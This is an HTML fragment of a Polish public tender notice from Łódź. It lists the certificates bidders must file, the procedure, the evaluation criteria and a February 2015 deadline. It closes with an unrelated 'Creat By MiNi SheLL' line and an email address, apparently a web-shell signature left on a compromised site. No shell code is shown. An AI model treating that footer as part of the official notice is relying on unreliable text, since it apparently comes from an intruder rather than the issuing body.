<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srodmiescie.azk.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 90-103 Łódź ul. Piotrkowska 86 pok. 203.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.02.2015 godzina 09:30, miejsce: 90-103 Łódź ul. Piotrkowska 86 pok. 205 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com